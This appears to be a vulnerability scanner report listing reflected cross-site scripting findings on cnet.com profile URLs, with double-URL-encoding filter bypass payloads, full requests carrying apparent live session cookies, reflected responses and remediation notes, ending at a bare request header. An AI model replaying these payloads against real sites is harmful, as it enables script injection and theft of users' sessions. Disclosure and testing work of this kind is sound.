HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:14 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jim kerstetter14dbe"><script>alert(1)</script>57e94eac02b"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0718%253cscript%253ealert%25281%2529%253c%252fscript%253efda29dad862 was submitted in the REST URL parameter 2. This input was echoed as e0718<script>alert(1)</script>fda29dad862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jim+kerstettere0718%253cscript%253ealert%25281%2529%253c%252fscript%253efda29dad862/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:16 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:16 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=918 Connection: Keep-Alive Content-Length: 31157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jim kerstettere0718<script>alert(1)</script>fda29dad862's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aca00%253cscript%253ealert%25281%2529%253c%252fscript%253efe31d02e123 was submitted in the REST URL parameter 2. This input was echoed as aca00<script>alert(1)</script>fe31d02e123 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/joshua.goldmanaca00%253cscript%253ealert%25281%2529%253c%252fscript%253efe31d02e123/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:47 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:48 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=984 Connection: Keep-Alive Content-Length: 31088
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>joshua.goldmanaca00<script>alert(1)</script>fe31d02e123's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e717cbe0f1db was submitted in the REST URL parameter 2. This input was echoed as a21f9"><script>alert(1)</script>717cbe0f1db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/joshua.goldmana21f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e717cbe0f1db/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:46 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:46 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=978 Connection: Keep-Alive Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="joshua.goldmana21f9"><script>alert(1)</script>717cbe0f1db"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 552a8%253cscript%253ealert%25281%2529%253c%252fscript%253ec0ea157668a was submitted in the REST URL parameter 2. This input was echoed as 552a8<script>alert(1)</script>c0ea157668a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jparker552a8%253cscript%253ealert%25281%2529%253c%252fscript%253ec0ea157668a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:39 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:39 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=967 Connection: Keep-Alive Content-Length: 31009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jparker552a8<script>alert(1)</script>c0ea157668a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe50c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebafdb7855cc was submitted in the REST URL parameter 2. This input was echoed as fe50c"><script>alert(1)</script>bafdb7855cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jparkerfe50c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebafdb7855cc/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jparkerfe50c"><script>alert(1)</script>bafdb7855cc"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 529b4%253cscript%253ealert%25281%2529%253c%252fscript%253ed206b3971c9 was submitted in the REST URL parameter 2. This input was echoed as 529b4<script>alert(1)</script>d206b3971c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jpfalcone529b4%253cscript%253ealert%25281%2529%253c%252fscript%253ed206b3971c9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:00 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:00 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=961 Connection: Keep-Alive Content-Length: 31083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jpfalcone529b4<script>alert(1)</script>d206b3971c9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3243f818394 was submitted in the REST URL parameter 2. This input was echoed as c13f9"><script>alert(1)</script>3243f818394 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jpfalconec13f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3243f818394/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:11:58 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:11:59 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jpfalconec13f9"><script>alert(1)</script>3243f818394"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e733464cb51d was submitted in the REST URL parameter 2. This input was echoed as a93fe"><script>alert(1)</script>733464cb51d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/justin.yua93fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e733464cb51d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:11:08 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:11:08 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=997 Connection: Keep-Alive Content-Length: 31106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="justin.yua93fe"><script>alert(1)</script>733464cb51d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b9a3%253cscript%253ealert%25281%2529%253c%252fscript%253e735ec90bf97 was submitted in the REST URL parameter 2. This input was echoed as 6b9a3<script>alert(1)</script>735ec90bf97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/justin.yu6b9a3%253cscript%253ealert%25281%2529%253c%252fscript%253e735ec90bf97/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:11:09 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:11:10 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=966 Connection: Keep-Alive Content-Length: 31039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>justin.yu6b9a3<script>alert(1)</script>735ec90bf97's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83098%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22a7a9a2d85 was submitted in the REST URL parameter 2. This input was echoed as 83098"><script>alert(1)</script>22a7a9a2d85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/katzmaier83098%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22a7a9a2d85/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:45 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:45 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=956 Connection: Keep-Alive Content-Length: 31140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="katzmaier83098"><script>alert(1)</script>22a7a9a2d85"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70163%253cscript%253ealert%25281%2529%253c%252fscript%253eda5233767fb was submitted in the REST URL parameter 2. This input was echoed as 70163<script>alert(1)</script>da5233767fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
